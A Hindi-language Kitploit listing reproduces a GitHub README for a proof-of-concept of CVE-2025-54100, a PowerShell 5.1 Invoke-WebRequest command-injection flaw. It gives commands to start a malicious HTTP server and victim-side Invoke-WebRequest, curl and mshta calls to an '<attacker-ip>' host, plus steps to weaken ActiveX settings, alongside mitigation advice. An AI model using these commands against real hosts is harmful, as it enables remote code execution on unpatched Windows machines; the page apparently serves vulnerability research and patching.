Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 उच्च) विंडोज़ PowerShell 5.1 के Invoke-WebRequest cmdlet में एक कमांड इंजेक्शन भेद्यता है। यह वेब प्रतिक्रियाओं के स्वचालित पार्सिंग के दौरान विशेष तत्वों के अनुचित निष्प्रभावीकरण के कारण उत्पन्न होती है। | Kitploit
उपकरण/GitHubGitHub/themehackers/cve-2025-54100
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 उच्च) विंडोज़ PowerShell 5.1 के Invoke-WebRequest cmdlet में एक कमांड इंजेक्शन भेद्यता है। यह वेब प्रतिक्रियाओं के स्वचालित पार्सिंग के दौरान विशेष तत्वों के अनुचित निष्प्रभावीकरण के कारण उत्पन्न होती है।

रिपॉजिटरी देखें
3178 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54100 – PowerShell प्रतिक्रिया पार्सिंग PoC

एक संक्षिप्त प्रूफ-ऑफ-कॉन्सेप्ट जो दिखाता है कि कैसे CVE-2025-54100 दुर्भावनापूर्ण HTML पार्सिंग के माध्यम से Windows PowerShell 5.1 में रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।

विषय-सूची

  • CVE-2025-54100 क्या है?
  • PoC कैसे काम करता है
  • त्वरित प्रारंभ
  • विक्टिम होस्ट से ट्रिगर करना
  • समस्या निवारण और सत्यापन
  • साक्ष्य
  • शमन
  • अस्वीकरण
  • संदर्भ

CVE-2025-54100 क्या है?

  • प्रकार: -UseBasicParsing का उपयोग नहीं करने पर Invoke-WebRequest में कमांड इंजेक्शन
  • गंभीरता: CVSS 7.8 (उच्च)
  • मूल कारण: HTML प्रतिक्रियाओं की MSHTML-आधारित पार्सिंग कॉलर के संदर्भ में स्क्रिप्ट निष्पादन (जैसे, ActiveXObject) की अनुमति देती है।
  • प्रभावित: Windows 10/11 और Windows Server 2008-2025 जो PowerShell 5.1 चला रहे हैं।

PoC कैसे काम करता है

  1. CVE-2025-54100.py में FastAPI सर्वर एक क्राफ्टेड HTML पेलोड परोसता है।
  2. पेलोड WScript.Shell / Shell.Application ActiveX ऑब्जेक्ट्स को इंस्टेंशिएट करने का प्रयास करता है।
  3. कमजोर होस्ट पर, MSHTML पार्सर स्क्रिप्ट निष्पादित करता है, calc.exe लॉन्च करके RCE प्रदर्शित करता है।
  4. आपूर्ति किया गया पेलोड जानबूझकर न्यूनतम और गैर-विनाशकारी है, लेकिन आगे के शोध के लिए इसे संशोधित किया जा सकता है।

त्वरित प्रारंभ

पूर्वापेक्षाएँ

  • Python 3.10+ (FastAPI और Uvicorn के साथ परीक्षण किया गया)
  • निर्भरताएँ इंस्टॉल करें:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

दुर्भावनापूर्ण सर्वर चलाएँ

PoC HTTP सर्वर प्रारंभ करें:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

विक्टिम होस्ट से ट्रिगर करना

इन्हें कमजोर Windows मशीन पर -UseBasicParsing के बिना चलाएँ:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

सर्वर के लिए कॉन्फ़िगर किए गए उसी पोर्ट का उपयोग करें। यदि सिस्टम कमजोर है, तो एम्बेडेड स्क्रिप्ट MSHTML पार्सर के माध्यम से निष्पादित होती है। कुछ AV उत्पाद इस व्यवहार को ब्लॉक कर सकते हैं, भले ही पार्सिंग समस्या मौजूद हो।

समस्या निवारण और सत्यापन

यदि calc.exe प्रकट नहीं होता है:

  1. विक्टिम पर इंटरनेट विकल्प खोलें।
  2. सुरक्षा → कस्टम स्तर... पर जाएँ।
  3. “स्क्रिप्टिंग के लिए सुरक्षित के रूप में चिह्नित न किए गए ActiveX नियंत्रणों को आरंभ और स्क्रिप्ट करें।” सक्षम करें।
  4. -UseBasicParsing के बिना Invoke-WebRequest फिर से चलाएँ।

यह निष्पादन वेक्टर को प्रदर्शित करता है। वास्तविक दुनिया के पेलोड डिफ़ॉल्ट प्रतिबंधों से बचने के लिए ऑब्सफस्केशन या अतिरिक्त बाईपास का उपयोग कर सकते हैं।

साक्ष्य

PoC

शमन

Microsoft ने दिसंबर 2025 में इस समस्या को पैच किया:

  1. प्रभावित Windows होस्ट पर सुरक्षा अपडेट लागू करें।
  2. MSHTML पार्सिंग से बचने के लिए -UseBasicParsing का उपयोग करें:
    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. PowerShell 7+ (pwsh) पर जाएँ, जो पार्सिंग के लिए MSHTML पर निर्भर नहीं करता है।

अस्वीकरण

[!WARNING] केवल शैक्षिक और अधिकृत परीक्षण के लिए। जिम्मेदारी से उपयोग करें और सभी लागू कानूनों का पालन करें। लेखक दुरुपयोग या क्षति के लिए उत्तरदायी नहीं हैं।

संदर्भ

  • NVD: CVE-2025-54100
  • MSRC: अपडेट गाइड
  • GitHub: osman1337-security/CVE-2025-54100
टूल डाउनलोड करें